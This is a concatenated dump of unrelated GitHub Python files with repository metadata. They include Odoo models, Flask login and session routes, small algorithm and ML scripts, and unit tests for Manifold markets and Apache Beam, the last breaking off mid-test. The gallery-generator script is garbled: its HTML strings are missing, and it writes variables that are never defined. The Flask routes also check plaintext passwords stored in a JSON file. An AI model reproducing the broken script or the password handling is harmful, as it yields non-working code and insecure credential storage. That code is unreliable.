fields.Boolean(\"Expired\", compute=\"_compute_expired\")\n user_id = fields.Many2one(\n \"res.users\",\n string=\"User\",\n index=True,\n required=True,\n ondelete=\"cascade\",\n default=lambda self: self.env.user,\n )\n\n @api.depends(\"access_token\")\n def _compute_url(self):\n base_url = self.env[\"ir.config_parameter\"].sudo().get_param(\"web.base.url\")\n for down in self:\n params = {\"token\": down.access_token}\n down.url = \"{}/oomusic/down?{}\".format(base_url, url_encode(params))\n\n def _compute_expired(self):\n for down in self:\n down.expired = bool(down.expiration_date < fields.Date.today())\n\n def _update_access_date(self, date):\n self.write({\"access_date\": date})\n self.env.cr.commit()\n\n\nclass MusicDownloadMixin(models.AbstractModel):\n _name = \"oomusic.download.mixin\"\n _description = \"Download Mixin\"\n\n download_ids = fields.One2many(\n \"oomusic.download\",\n \"res_id\",\n string=\"Download Links\",\n domain=lambda self: [(\"res_model\", \"=\", self._name)],\n auto_join=True,\n )\n\n def _get_track_ids(self):\n return self.track_ids\n\n def unlink(self):\n \"\"\" When removing a record, its rating should be deleted too. 
\"\"\"\n rec_ids = self.ids\n res = super(MusicDownloadMixin, self).unlink()\n self.env[\"oomusic.download\"].sudo().search(\n [(\"res_model\", \"=\", self._name), (\"res_id\", \"in\", rec_ids)]\n ).unlink()\n return res\n\n def action_create_download_link(self):\n for obj in self:\n record_model_id = (\n self.env[\"ir.model\"].sudo().search([(\"model\", \"=\", obj._name)], limit=1).id\n )\n self.env[\"oomusic.download\"].create({\"res_model_id\": record_model_id, \"res_id\": obj.id})\n return True\n\n def action_download(self):\n params = {\n \"model\": self._name,\n \"id\": self.id,\n \"flatten\": 1 if self._name in [\"oomusic.track\", \"oomusic.playlist\"] else 0,\n }\n return {\n \"type\": \"ir.actions.act_url\",\n \"url\": \"/oomusic/down_user?{}\".format(url_encode(params)),\n \"target\": \"new\",\n }\n","repo_name":"DocMarty84/oomusic","sub_path":"models/oomusic_download.py","file_name":"oomusic_download.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"20943801154","text":"import numpy as np\nfrom torchvision import datasets\n\n\ndef load_cifar10(\n dataset_path: str, is_train: bool, image_transforms: \"Albumentation Transforms\"\n) -> \"PyTorch Dataset\":\n\n \"\"\"\n Load CIFAR10 dataset using torchvision.\n ---------------------------------------\n\n - Input: dataset_path, is_train, and image_transforms.\n - Output: PyTorch Dataset object.\n \"\"\"\n\n return datasets.CIFAR10(\n root=dataset_path,\n train=is_train,\n download=True,\n transform=lambda x: image_transforms(image=np.array(x))[\"image\"],\n )\n","repo_name":"ShreyJ1729/EVA6-TSAI","sub_path":"08-AdvancedTrainingConcepts/app/datasets/cifar10.py","file_name":"cifar10.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32383136441","text":"import heapq\nimport sys\n\ndef solv(graph, updateList, start_node):\n queue = []\n heapq.heappush(queue, [0, start_node])\n updateList[start_node] = 0\n\n while queue:\n current_weight, current_node = heapq.heappop(queue)\n\n if updateList[current_node] < current_weight:\n continue\n\n for new_node, new_weight in graph[current_node]:\n next_weight = current_weight + new_weight\n\n if next_weight < updateList[new_node] and N_arr[new_node] == 0:\n updateList[new_node] = next_weight\n heapq.heappush(queue, [next_weight, new_node])\n\nif __name__ == \"__main__\":\n N, M = map(int, input().split())\n N_arr = list(map(int, input().split()))\n graph = [[] for _ in range(N+1)]\n updateList = [sys.maxsize] * (N+1)\n N_arr[-1] = 0\n\n for _ in range(M):\n a, b, t = map(int, input().split())\n graph[a].append([b, t])\n graph[b].append([a, t])\n\n solv(graph, updateList, 0)\n \n if updateList[N-1] < sys.maxsize:\n print(updateList[N-1])\n else:\n print(-1)","repo_name":"donghyo8/PS","sub_path":"donghyo/baekjoon/Graph Algorithm/17396.py","file_name":"17396.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"17097765458","text":"#!/usr/bin/python3\nimport sys\nimport random\nimport pandas as pd\n\n\n#Variables globales\nnClientes=0\nleGusta=[]\nnoLeGusta=[]\ningredientesDisponibles=set()\n\n\n#Indico que voy a coger el primer parametro como fichero de entrada\nfichero=sys.argv[1]\nsys.stdin = open(fichero, \"r\")\n\n\n\n#Leo el numero de potenciales clientes \nnClientes=int(sys.stdin.readline())\n\n\n#Por cada cliente, leemos sus preferencias que gustan y no gustan\nfor i in range(nClientes):\n leGusta.append(sys.stdin.readline().strip().split(\" \")[1:])\n noLeGusta.append(sys.stdin.readline().strip().split(\" \")[1:])\n\n #Incluimos ingredientes que gustan a la lista total de ingredientes\n for ingr in leGusta[i]:\n ingredientesDisponibles.add(ingr)\n #Incluimos ingredientes que no gustan a la lista total de ingredientes\n for ingr in noLeGusta[i]:\n ingredientesDisponibles.add(ingr)\n \n\n\n#Dataframe de lo que gusta y no gusta:\ndfGusta = pd.DataFrame(columns = ['Ingredientes', 'Conteo'])\n#Dataframe de lo que no gusta:\ndfNoGusta = pd.DataFrame(columns = ['Ingredientes', 'Conteo'])\n\nfor ingr in ingredientesDisponibles:\n #Para cada elemento, contamos cuantos hay\n elementos=sum(x.count(ingr) for x in leGusta)\n\n fila = pd.Series([ingr,elementos], index = dfGusta.columns)\n dfGusta = dfGusta.append(fila, ignore_index=True)\n \n\nfor ingr in ingredientesDisponibles:\n #Para cada elemento, contamos cuantos hay\n elementos=sum(x.count(ingr) for x in noLeGusta)\n\n fila = pd.Series([ingr,elementos], index = dfNoGusta.columns)\n dfNoGusta = dfNoGusta.append(fila, ignore_index=True)\n\ndfGusta=dfGusta.sort_values('Conteo', ascending=False)\n#dfGusta.head()\n\ndfNoGusta=dfNoGusta.sort_values('Conteo', ascending=False)\npd.set_option(\"max_rows\", None)\ndfNoGusta.head()\n\n\nlistaGusta=list(dfGusta[\"Ingredientes\"])\n\n#Imprimimos salida estandard los que no gustan\nfor x in dfNoGusta[\"Ingredientes\"]:\n if x in listaGusta:\n print(x)\n","repo_name":"sergarb1/Competitive-Programming-Solved-Problems","sub_path":"Google-HashCode/OnePizza2022/generarNoGustanOrdenado.py","file_name":"generarNoGustanOrdenado.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"es","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"7332401025","text":"import taichi as ti\nfrom ..Types import HittableObjectType, HitResult, make_object_constructor, HittableObject, HittableObjectDefaults\n\n\nSphere = make_object_constructor(\n HittableObjectType.SPHERE,\n HittableObject,\n HittableObjectDefaults,\n)\n\n\n@ti.func\ndef hit(sphere, ray, t_min=0.001, t_max=10e8):\n oc = ray.origin - sphere.center\n a = ray.direction.dot(ray.direction)\n b = 2 * ray.direction.dot(oc)\n c = oc.dot(oc) - sphere.radius * sphere.radius\n\n root = 0.\n discriminant = (b * b) - (4 * a * c)\n did_hit = False\n hit_point = ti.Vector([0., 0., 0.])\n hit_point_normal = ti.Vector([0., 0., 0.])\n front_face = False\n\n if discriminant > 0:\n discriminant_sqrt = ti.sqrt(discriminant)\n a2 = a * 2\n root = (-b - discriminant_sqrt) / a2\n if root < t_min or root > t_max:\n root = (-b + discriminant_sqrt) / a2\n if t_min <= root <= t_max:\n did_hit = True\n else:\n did_hit = True\n\n if did_hit:\n hit_point = ray.at(root)\n hit_point_normal = (hit_point - sphere.center) / sphere.radius\n # Check which side does the ray hit, we set the hit point normals always point outward from the surface\n if ray.direction.dot(hit_point_normal) < 0:\n front_face = True\n else:\n hit_point_normal = -hit_point_normal\n\n # return did_hit, root, self.color\n return HitResult(\n did_hit=did_hit,\n root=root,\n color=sphere.color,\n hit_point=hit_point,\n hit_point_normal=hit_point_normal,\n front_face=front_face,\n material=sphere.material,\n id=-1,\n )\n","repo_name":"zojize/taichi_course01_final","sub_path":"taichi_course01_final/HittableObject/Sphere.py","file_name":"Sphere.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"6149072717","text":"\"\"\"\nRun unit tests on the text module.\n\"\"\"\n\nimport os\nimport sys\nimport unittest\n\npath = os.path.join(os.path.dirname(__file__), '..', '..')\nif path not in sys.path:\n sys.path.append(path)\n\nfrom wikinterface import text\n\nclass TestText(unittest.TestCase):\n \"\"\"\n Test the text module.\n \"\"\"\n\n def test_collect_none(self):\n \"\"\"\n Test that when no pages are given, an empty dictionary is returned.\n \"\"\"\n\n extracts = text.collect([ ])\n self.assertFalse(len(extracts))\n\n def test_redirection(self):\n \"\"\"\n Test that pages may redirect, but the original pages are retained.\n \"\"\"\n\n page = 'Olympique Lyon'\n extracts = text.collect(page)\n self.assertTrue(page in extracts)\n\n def test_get_multiple_full(self):\n \"\"\"\n Test that when multiple full pages are requested, they are all returned, and in full.\n \"\"\"\n\n pages = [ 'Olympique Lyonnais', 'Borussia Dortmund' ]\n extracts = text.collect(pages)\n self.assertEqual(2, len(extracts))\n self.assertEqual(set(pages), set(list(extracts.keys())))\n self.assertTrue(all(len(text) for text in extracts.values()))\n\n def test_get_introduction_only(self):\n \"\"\"\n Test that when only the introduction is requested, it is returned.\n \"\"\"\n\n page = 'Olympique Lyon'\n introduction = text.collect(page, introduction_only=True)\n extract = text.collect(page, introduction_only=False)\n self.assertLess(len(introduction[page]), len(extract[page]))\n\n def test_get_multiple_introductions(self):\n \"\"\"\n Test that when multiple introductions are requested, they are all returned.\n \"\"\"\n\n pages = [ 'Olympique Lyonnais', 'Borussia Dortmund' ]\n extracts = text.collect(pages, introduction_only=True)\n self.assertEqual(2, len(extracts))\n self.assertEqual(set(pages), set(list(extracts.keys())))\n self.assertTrue(all(len(text) for text in extracts.values()))\n\n def test_get_page_with_accent(self):\n \"\"\"\n Test that pages that contain an accent in their title are retrieved normally.\n \"\"\"\n\n page = 'Ciprian Tătărușanu'\n extracts = text.collect(page, introduction_only=True)\n self.assertEqual(1, len(extracts))\n self.assertTrue(page in extracts)\n self.assertGreater(len(extracts[page]), 100)\n\n def test_get_long_list(self):\n \"\"\"\n Test that when getting a long list (greater than the stagger value), all pages are retrieed.\n \"\"\"\n\n pages = [ 'Anthony Lopes', 'Mapou Yanga-Mbiwa', 'Joachim Andersen',\n 'Rafael', 'Jason Denayer', 'Marcelo', 'Martin Terrier',\n 'Houssem Aouar', 'Moussa Dembélé', 'Bertrand Traoré',\n 'Memphis Depay', 'Thiago Mendes', 'Léo Dubois', 'Oumar Solet',\n 'Jeff Reine-Adélaïde', 'Rayan Cherki', 'Bruno Guimarães',\n 'Amine Gouiri', 'Marçal', 'Karl Toko Ekambi', 'Jean Lucas',\n 'Kenny Tete', 'Maxence Caqueret', 'Camilo Reijers de Oliveira',\n 'Maxwel Cornet', 'Youssouf Koné', 'Lucas Tousart',\n 'Ciprian Tătărușanu', 'Boubacar Fofana']\n\n extracts = text.collect(pages, introduction_only=True)\n self.assertEqual(len(pages), len(extracts))\n self.assertEqual(set(pages), set(list(extracts.keys())))\n self.assertTrue(all(len(text) > 100 for text in extracts.values()))\n","repo_name":"NicholasMamo/eld-data","sub_path":"lib/wikinterface/tests/test_text.py","file_name":"test_text.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"30304812727","text":"#!/usr/bin/env python3\n\n# gallery generator\n# feb. 2, 2023\n# ------------------------------\n# arg 1: gallery dir on os\n# arg 2: dir name on server\n# arg 3: lightbox name on page\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport sys\n\n\n#print ('Number of arguments:', len(sys.argv), 'arguments.')\n#print ('Argument List:', str(sys.argv))\n#print ('1st', str(sys.argv[1]))\n\nGALLERY_DIR = str(sys.argv[1])\nINCLUDE_CAPTIONS = False\nLIGHTBOX_NAME = str(sys.argv[3])\nDIR_NAME = str(sys.argv[2])\n\n\n# --------------------------------------\n\nfile = open( (\"%s/%s.php\" % (GALLERY_DIR, LIGHTBOX_NAME) ), \"w+\")\n\ndir_files = os.listdir(GALLERY_DIR)\nimg_files = []\n\nfor f in dir_files:\n\tif not f.startswith('.'):\n\t\tif not f.startswith(LIGHTBOX_NAME):\n\t\t\timg_files.append(f)\n\n#print(img_files)\n\n# --------------------------------------\n\ncount = 0\nrow_opened = False\n\nfor f in img_files:\n\tname = f.split('.')[0]\n\textension = f.split('.')[1]\n\tlink_url = ('images/%s/%s' % (DIR_NAME, f))\n\tthumb_url = ('images/%s/%s-thumb.%s' % (DIR_NAME, name, extension))\n\n\t#print(link_url)\n\t#print(thumb_url)\n\n\t# --------------------------------------\n\n\trow_line1 = (\"\\r\\n\")\n\tcol_line1 = (\"\\t
\\r\\n\")\n\trow_line2 = (\"
\\r\\n\\r\\n\\r\\n\")\n\n\t# --------------------------------------\n\n\tif count == 4:\n\t\tcount = 0\n\n\tif count == 0:\n\t\tfile.write(row_line1)\n\t\trow_opened = True\n\n\tfile.write(col_line1)\n\tfile.write(fig_line1)\n\tfile.write(link_line1)\n\tfile.write(img_line1)\n\tfile.write(link_line2)\n\tif INCLUDE_CAPTIONS:\n\t\tfile.write(caption_line)\n\telse:\n\t\tfile.write(caption_line_alternate)\n\tfile.write(fig_line2)\n\tfile.write(col_line2)\n\n\tcount = count+1\n\n\tif count == 4:\n\t\tfile.write(row_line2)\n\t\trow_opened = False\n\n\n# can happen if count doesn't reach 4\nif row_opened == True:\n\tfile.write(row_line2)\n\trow_opened = False\n\nfile.close() \n\n# --------------------------------------\n\n","repo_name":"RobotGrrl/lexiconficus","sub_path":"website/gallery_gen.py","file_name":"gallery_gen.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"34885439006","text":"# -*- coding: utf-8 -*-\nfrom odoo import fields, models, api, _, sql_db\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT\nfrom odoo.exceptions import UserError\nimport tempfile\nimport base64\nfrom datetime import datetime\nimport xlrd\nfrom xlrd import open_workbook\nimport threading\n\n\nclass MasterCustomImport(models.TransientModel):\n _name = 'master.custom.import'\n\n xls_file = fields.Binary(\"Import\")\n datas_file = fields.Char('Filename')\n\n def import_xls(self):\n datafile = self.xls_file\n file_name = str(self.datas_file)\n if not datafile:\n raise UserError('File Masih Kosong!')\n try:\n book = xlrd.open_workbook(file_contents=base64.decodebytes(self.xls_file))\n except xlrd.XLRDError as e:\n raise UserError('Tolong hanya upload file xlsx saja, Terima Kasih')\n header = {}\n sheet = book.sheet_by_index(0)\n\n #get header\n for col in range(sheet.ncols):\n if sheet.cell_value(0, col) == 'Nama Item':\n header['name'] = col\n elif sheet.cell_value(0, col) == 'Tanggal Mulai Pengerjaan':\n header['tanggal_mulai'] = col\n elif sheet.cell_value(0, col) == 'Nama Komponen':\n header['komponen.name'] = col\n elif sheet.cell_value(0, col) == 'Waktu Pengerjaan Komponen':\n header['komponen.waktu_pengerjaan'] = col\n elif sheet.cell_value(0, col) == 'Tipe Waktu':\n header['komponen.tipe_waktu'] = col\n elif sheet.cell_value(0, col) == 'Bobot Presentase Komponen':\n header['line_ids.percentage'] = col\n\n all_vals = []\n last_item = -1\n for row in range(sheet.nrows):\n if row == 0:\n continue\n vals = {}\n if sheet.cell_value(row, header['name']):\n vals['name'] = sheet.cell_value(row, header['name'])\n if sheet.cell_value(row, header['tanggal_mulai']):\n exceltime = sheet.cell_value(row, header['tanggal_mulai'])\n time_tuple = xlrd.xldate_as_tuple(exceltime, 0)\n date_py = datetime(*time_tuple)\n date_str = date_py.strftime(DEFAULT_SERVER_DATE_FORMAT)\n vals['tanggal_mulai'] = date_str\n\n komponen = self.env['master.komponen'].search(\n [('name', '=', sheet.cell_value(row, header['komponen.name']))])\n komponen = komponen[0] if komponen else False\n\n if not komponen:\n komponen = self.env['master.komponen'].create({\n 'name': sheet.cell_value(row, header['komponen.name']) if header['komponen.name'] else False,\n 'tipe_waktu': sheet.cell_value(row, header['komponen.tipe_waktu']) if header['komponen.tipe_waktu'] else 'hari',\n 'waktu_pengerjaan': sheet.cell_value(row, header['komponen.waktu_pengerjaan']) if header['komponen.waktu_pengerjaan'] else False\n })\n else:\n komponen.write({\n 'tipe_waktu': sheet.cell_value(row, header['komponen.tipe_waktu']) if header['komponen.tipe_waktu'] else komponen.tipe_waktu,\n 'waktu_pengerjaan': int(sheet.cell_value(row, header['komponen.waktu_pengerjaan'])) if header['komponen.waktu_pengerjaan'] else komponen.waktu_pengerjaan,\n })\n\n if vals:\n line_ids = [(0, 0, {\n 'komponen': komponen.id,\n 'percentage': int(sheet.cell_value(row, header['line_ids.percentage'])) * 100 if header['line_ids.percentage'] else 0\n })]\n vals['line_ids'] = line_ids\n last_item += 1\n all_vals.append(vals)\n else:\n vals = all_vals[last_item]\n line_ids = vals.get('line_ids', [])\n line_ids.append((0, 0, {\n 'komponen': komponen.id,\n 'percentage': int(sheet.cell_value(row, header['line_ids.percentage']) * 100 if header['line_ids.percentage'] else 0)\n }))\n vals['line_ids'] = line_ids\n all_vals[last_item] = vals\n\n for rec in all_vals:\n res = self.env['master.item'].create(rec)\n\n action = 
self.env.ref('wr_pintar_master.action_master_item').read()[0]\n return action\n\n\n\n\n\n\n\n","repo_name":"sharibar/wr_pintar_recruitment","sub_path":"wr_pintar_master/wizard/master_custom_import.py","file_name":"master_custom_import.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7681167724","text":"from flask import request, render_template, jsonify, make_response, abort, Blueprint\nfrom datetime import datetime\nfrom module.function import getUserId\nimport json\nimport uuid\n\napp = Blueprint('user', __name__)\n\n\n# アカウント認証\n@app.route('/user/login', methods=[\"POST\"])\ndef user_login():\n user_id = request.json.get('user_id', None)\n ps = request.json.get('password', None)\n\n # JSON読み込み\n with open('user.json') as f:\n user_data = json.load(f)\n user_list = list(user_data)\n\n session_id = str(uuid.uuid4())\n now_time = datetime.now()\n now = \"{0:%Y-%m-%d %H:%M:%S}\".format(now_time)\n\n for i in range(len(user_list)):\n if user_list[i].get('user_id') == user_id and user_list[i].get('password') == ps:\n # JSON読み込み\n with open('session.json') as f:\n session_data = json.load(f)\n session_list = list(session_data)\n # 追加\n flag = False\n\n for j in range(len(session_list)):\n if session_list[j].get('user_id') == user_id:\n session_list[j]['session_id'] = session_id\n session_list[j]['life_time'] = now\n flag = True\n\n if not flag:\n dic = {'session_id': session_id,\n 'user_id': user_id, 'life_time': now}\n session_list.append(dic)\n\n with open('session.json', 'w') as f:\n json.dump(session_list, f, indent=4, ensure_ascii=False)\n\n response = make_response(jsonify({\"message\": \"Success\"}))\n response.set_cookie(\"session_id\", value=session_id)\n return response\n\n return jsonify({\"message\": \"Error\"})\n\n\n@app.route('/user/logout', methods=[\"POST\"])\ndef user_logout():\n cookie = request.cookies.get('session_id', None)\n\n with open('session.json') as f:\n session_data = json.load(f)\n session_list = list(session_data)\n\n for i in range(len(session_list)):\n if session_list[i].get('session_id') == cookie:\n session_list.remove(session_list[i])\n with open('session.json', 'w') as f:\n json.dump(session_list, f, indent=4, ensure_ascii=False)\n return jsonify({\"message\": \"Success\"})\n\n return jsonify({\"message\": \"Error\"})\n\n\n# セッション認証\n@app.route('/user/session', methods=[\"POST\"])\ndef session():\n cookie = request.cookies.get('session_id', None)\n user_id = getUserId(cookie)\n\n if not user_id is None:\n with open('user.json') as f:\n user_data = json.load(f)\n user_list = list(user_data)\n for i in user_list:\n if i['user_id'] == user_id:\n return jsonify({\n \"user_id\": i['user_id'],\n \"name\": i['name'],\n \"image\": i['image']\n })\n\n return jsonify({\"message\": \"Error\"})\n\n\n# アカウント情報の取得\n@app.route('/user/', methods=[\"POST\", \"GET\"])\ndef account_info(user_id):\n session_id = request.cookies.get('session_id', None)\n session_user_id = getUserId(session_id)\n\n # JSON読み込み\n with open('user.json') as f:\n user_data = json.load(f)\n user_list = list(user_data)\n\n with open('haiku.json') as f:\n haiku_data = json.load(f)\n haiku_list = list(haiku_data)\n\n if request.method == 'GET':\n for i in range(len(user_list)):\n if user_id == user_list[i].get('user_id'):\n return render_template('user.html', user_id=user_id)\n abort(404, description=\"Page Not Found\")\n\n if request.method == 'POST':\n user = {}\n for i in range(len(user_list)):\n if user_id == user_list[i].get('user_id'):\n user = user_list[i]\n\n session_user = {}\n for i in range(len(user_list)):\n if session_user_id == user_list[i].get('user_id'):\n session_user = user_list[i]\n\n haiku = []\n for i in range(len(haiku_list)):\n if user.get('user_id') == haiku_list[i].get('user_id'):\n if not session_user_id is None:\n haiku_list[i]['liked'] = 
\"True\" if haiku_list[i]['id'] in session_user['favorite'] else \"False\"\n haiku.append(haiku_list[i])\n\n if user == {}:\n return jsonify({\"message\": \"Error\"})\n\n return jsonify({\n \"user_id\": user['user_id'],\n \"name\": user['name'],\n \"image\": user['image'],\n \"haiku\": haiku\n })\n","repo_name":"2020-AIT-OOP2-Group1/Haikutter","sub_path":"router/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"1440981081","text":"import cv2\nimport numpy as np\n#Read Image\nimg = cv2.imread('testing.jpg')\n#Display Image\ncv2.imshow('image',img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#Applying Grayscale filter to image\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n#Saving filtered image to new file\ncv2.imwrite('graytest.jpg',gray)\n","repo_name":"pratyushmore/computer-vision-course","sub_path":"assign1_convolution/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"73201190306","text":"import requests\nimport pandas as pd\nimport scipy\nimport numpy \nimport sys\nfrom sklearn.linear_model import ElasticNet,LinearRegression\n\nTRAIN_DATA_URL = \"https://storage.googleapis.com/kubric-hiring/linreg_train.csv\"\nTEST_DATA_URL = \"https://storage.googleapis.com/kubric-hiring/linreg_test.csv\"\n\n\ndef predict_price(area) -> float:\n \"\"\"\n This method must accept as input an array `area` (represents a list of areas sizes in sq feet) and must return the respective predicted prices (price per sq foot) using the linear regression model that you build.\n\n You can run this program from the command line using `python3 regression.py`.\n \"\"\"\n response = requests.get(TRAIN_DATA_URL)\n train_data=pd.read_csv(TRAIN_DATA_URL,header=None)\n \n train_area=train_data.loc[0]\n train_price=train_data.loc[1]\n train_area=train_area.iloc[1:]\n \n train_price=train_price.iloc[1:]\n train_area=train_area.to_numpy()\n train_price=train_price.to_numpy()\n \n train_area=train_area.reshape((train_area.shape[0],1))\n train_price=train_price.reshape((train_price.shape[0],1))\n \n El=ElasticNet(alpha=0.5,l1_ratio=1,normalize=False)\n El.fit(train_area,train_price)\n area=area.reshape((area.shape[0],1))\n \n return El.predict(area)\n \n ...\n\n\nif __name__ == \"__main__\":\n # DO NOT CHANGE THE FOLLOWING CODE\n from data import validation_data\n areas = numpy.array(list(validation_data.keys()))\n prices = numpy.array(list(validation_data.values()))\n predicted_prices = predict_price(areas)\n rmse = numpy.sqrt(numpy.mean((predicted_prices - prices) ** 2))\n try:\n assert rmse < 170\n except AssertionError:\n print(f\"Root mean squared error is too high - {rmse}. Expected it to be under 170\")\n sys.exit(1)\n print(f\"Success. RMSE = {rmse}\")\n","repo_name":"AVSBharadwaj/Kubrik","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"28617252226","text":"from collections import deque\nimport itertools\n\nnums = [1,2,3]\n\n# perm = itertools.permutations(nums)\n\n# s=[]\n# for i in list(perm):\n# s.append(i)\n# print(s)\n\n\nclass Solution:\n def permute(self, nums):\n result = []\n\n # base case\n if len(nums) == 1:\n return [nums.copy()]\n\n for i in range(len(nums)):\n x = nums.pop(0)\n perms = self.permute(nums)\n\n for perm in perms:\n perm.append(x)\n result.extend(perms)\n nums.append(x)\n return result","repo_name":"avisionary/leetcode-solutions","sub_path":"python_codes/46.py","file_name":"46.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9898195818","text":"from __future__ import annotations\n\nfrom pickle import dumps, loads\nfrom urllib.parse import quote\n\nfrom ..market import Market\nfrom . import manifold_vcr, mkt\n\nassert mkt # just need to access it so mypy doesn't complain\n\n\ndef assert_equality(mkt1: Market, mkt2: Market) -> None:\n \"\"\"Ensure that two markets are referring to the same underlying system.\"\"\"\n for attr in dir(mkt2):\n attr1 = getattr(mkt1, attr)\n attr2 = getattr(mkt2, attr)\n if callable(attr1) and callable(attr2):\n continue\n elif attr.startswith('__'):\n continue\n elif attr not in ('client', 'logger', 'market', 'event_emitter'):\n assert attr1 == attr2\n elif attr == 'market':\n assert mkt1.market.id == mkt2.market.id\n\n\ndef test_repr(mkt: Market) -> None:\n \"\"\"Make sure that repr does not error on common cases.\"\"\"\n assert repr(mkt)\n\n\ndef test_get_state(mkt: Market) -> None:\n \"\"\"Make sure that we are not divulging secrets.\"\"\"\n state = mkt.__getstate__()\n assert getattr(state.get('client'), 'api_key', None) is None\n assert 'logger' not in state\n\n\ndef test_pickling(mkt: Market) -> None:\n \"\"\"Make sure Markets can be dumped to disk and reloaded.\"\"\"\n with manifold_vcr.use_cassette(f'test_market/pickle_load/{quote(mkt.id)}.yaml'):\n new_mkt: Market = loads(dumps(mkt))\n assert_equality(mkt, new_mkt)\n\n\ndef test_from_url(mkt: Market) -> None:\n \"\"\"Make sure Markets can be grabbed by URL.\"\"\"\n with manifold_vcr.use_cassette(f'test_market/fetch_by_url/{quote(mkt.id)}.yaml'):\n assert mkt.market.url\n mkt2 = Market.from_url(mkt.market.url)\n assert_equality(mkt, mkt2)\n\n\ndef test_from_id(mkt: Market) -> None:\n \"\"\"Make sure Markets can be grabbed by ID.\"\"\"\n with manifold_vcr.use_cassette(f'test_market/fetch_by_id/{quote(mkt.id)}.yaml'):\n mkt2 = Market.from_id(mkt.id)\n assert_equality(mkt, mkt2)\n","repo_name":"LivInTheLookingGlass/ManifoldMarketManager","sub_path":"ManifoldMarketManager/test/test_market.py","file_name":"test_market.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"12516908130","text":"import time\nimport unittest\nfrom unittest.mock import MagicMock\nfrom unittest.mock import patch\n\nimport apache_beam as beam\nfrom apache_beam import coders\nfrom apache_beam.options.pipeline_options import PipelineOptions\nfrom apache_beam.portability.api import beam_interactive_api_pb2\nfrom apache_beam.runners.interactive import background_caching_job as bcj\nfrom apache_beam.runners.interactive import interactive_beam as ib\nfrom apache_beam.runners.interactive import interactive_environment as ie\nfrom apache_beam.runners.interactive.caching.cacheable import CacheKey\nfrom apache_beam.runners.interactive.interactive_runner import InteractiveRunner\nfrom apache_beam.runners.interactive.options.capture_limiters import Limiter\nfrom apache_beam.runners.interactive.recording_manager import ElementStream\nfrom apache_beam.runners.interactive.recording_manager import Recording\nfrom apache_beam.runners.interactive.recording_manager import RecordingManager\nfrom apache_beam.runners.interactive.testing.test_cache_manager import FileRecordsBuilder\nfrom apache_beam.runners.interactive.testing.test_cache_manager import InMemoryCache\nfrom apache_beam.runners.runner import PipelineState\nfrom apache_beam.testing.test_stream import TestStream\nfrom apache_beam.testing.test_stream import WindowedValueHolder\nfrom apache_beam.transforms.window import GlobalWindow\nfrom apache_beam.utils.timestamp import MIN_TIMESTAMP\nfrom apache_beam.utils.windowed_value import WindowedValue\n\n\nclass MockPipelineResult(beam.runners.runner.PipelineResult):\n \"\"\"Mock class for controlling a PipelineResult.\"\"\"\n def __init__(self):\n self._state = PipelineState.RUNNING\n\n def wait_until_finish(self):\n pass\n\n def set_state(self, state):\n self._state = state\n\n @property\n def state(self):\n return self._state\n\n def cancel(self):\n self._state = PipelineState.CANCELLED\n\n\nclass ElementStreamTest(unittest.TestCase):\n def setUp(self):\n self.cache = InMemoryCache()\n self.p = beam.Pipeline()\n self.pcoll = self.p | beam.Create([])\n self.cache_key = str(CacheKey('pcoll', '', '', ''))\n\n # Create a MockPipelineResult to control the state of a fake run of the\n # pipeline.\n self.mock_result = MockPipelineResult()\n ie.current_env().add_user_pipeline(self.p)\n ie.current_env().set_pipeline_result(self.p, self.mock_result)\n ie.current_env().set_cache_manager(self.cache, self.p)\n\n def test_read(self):\n \"\"\"Test reading and if a stream is done no more elements are returned.\"\"\"\n\n self.mock_result.set_state(PipelineState.DONE)\n self.cache.write(['expected'], 'full', self.cache_key)\n self.cache.save_pcoder(None, 'full', self.cache_key)\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=1, max_duration_secs=1)\n\n self.assertFalse(stream.is_done())\n self.assertEqual(list(stream.read())[0], 'expected')\n self.assertTrue(stream.is_done())\n\n def test_done_if_terminated(self):\n \"\"\"Test that terminating the job sets the stream as done.\"\"\"\n\n self.cache.write(['expected'], 'full', self.cache_key)\n self.cache.save_pcoder(None, 'full', self.cache_key)\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=100, max_duration_secs=10)\n\n self.assertFalse(stream.is_done())\n self.assertEqual(list(stream.read(tail=False))[0], 'expected')\n\n # The limiters were not reached, so the stream is not done yet.\n self.assertFalse(stream.is_done())\n\n self.mock_result.set_state(PipelineState.DONE)\n 
